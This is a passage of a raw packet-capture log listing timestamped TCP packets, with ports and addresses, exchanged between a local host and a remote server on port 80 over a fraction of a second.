Jul 1, 2024 13:02:07.668683052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.668689013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.668715000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.668726921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.669502974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.669513941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.669523954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.669538021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.669552088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.670192003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.675822973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.675885916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.675906897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.675918102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.675968885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.675990105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.676075935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676085949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676095009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676105022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676126003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.676145077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.676516056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676528931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676585913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.676958084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676970005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676980019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.676991940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.677006960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.677016020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.677041054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.677050114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.678039074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.678080082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.678092003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.678098917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.678133965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.678155899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.678167105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.678177118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.678188086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.678193092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.678217888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.678246021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.685364962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.685436010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.685719013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.685771942 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.685945034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.686012983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.686018944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.686029911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.686050892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.686099052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.686296940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.686309099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.686321020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.686342001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.686364889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.694271088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.694327116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.694511890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.694524050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.694561958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.694581032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.694639921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.694650888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.694662094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.694689035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.694699049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.695130110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.695139885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.695152998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.695163965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.695177078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.695183039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.695192099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.695205927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.695211887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.695233107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.695250034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.695950031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696005106 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.696387053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696458101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.696499109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696510077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696552038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.696794033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696805000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696815968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696825981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.696855068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.696871042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.697392941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.697403908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.697413921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.697422981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.697428942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.697436094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.697441101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.697451115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.697458982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.697474957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.697503090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.699959040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.700011015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.700062037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.700078011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.700102091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.700120926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.700217962 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.700277090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.700356960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.700367928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.700380087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.700407028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.700443983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.767839909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.767927885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.767941952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.767982960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.768024921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.768095016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768150091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.768313885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768325090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768336058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768347979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768363953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.768397093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.768879890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768891096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768902063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768914938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768929958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768935919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.768945932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.768954992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.768973112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.769007921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.769846916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.769859076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.769870043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.769881964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.769896030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.769901991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.769912958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.769923925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.769932032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.769946098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.769972086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.770761967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.770773888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.770786047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.770797014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.770809889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.770818949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.770829916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.770833015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.770843029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.770879030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.770893097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.771708965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.771720886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.771732092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.771742105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.771750927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.771759987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.771768093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.771778107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.771796942 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.771814108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.772619963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.772633076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.772644043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.772655010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.772665977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.772674084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.772685051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.772696972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.772706032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.772725105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.772753000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.773572922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.773585081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.773596048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.773607969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.773618937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.773627043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.773637056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.773648977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.773660898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.773686886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.774490118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.774502039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.774513006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.774530888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.774538994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.774549007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.774557114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.774566889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.774579048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.774588108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.774616003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.775396109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.775408030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.775419950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.775432110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.775446892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.775451899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.775460958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.775476933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.775482893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.775491953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.775511980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.775531054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.776133060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.776145935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.776156902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.776170015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.776176929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.776186943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.776201010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.776206017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.776227951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.776247978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.782396078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.782471895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.782486916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.782491922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.782540083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.782557964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.782689095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.782699108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.782711029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.782722950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.782732964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.782768965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.788789988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.788853884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.788901091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.788913012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.788955927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.789144039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789194107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.789277077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789288044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789299011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789309978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789324045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.789355040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.789840937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789851904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789865017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789876938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789886951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.789896965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789908886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.789916992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.789951086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.790837049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.790887117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.790919065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.790930986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.790972948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.791261911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791271925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791284084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791311979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.791323900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.791696072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791712999 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791723013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791733980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791740894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.791752100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791763067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.791769028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.791790009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.791822910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.792464972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.792476892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.792515993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.794461012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.794554949 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.794598103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.794608116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.794648886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.794785023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.794795036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.794826984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.794852018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.794867039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.794909954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.795011044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.795022011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.795064926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.854166985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854291916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.854320049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854331970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854429960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.854494095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854505062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854516029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854578018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.854697943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.854954958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854965925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854976892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.854988098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.855000019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.855007887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.855017900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.855035067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.855062962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.855811119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.855822086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.855866909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.858870983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.858916998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.858926058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.858933926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.858967066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.858975887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.859195948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859206915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859219074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859230995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.859260082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.859260082 CEST	49705	80	192.168.2.5	147.45.78.162
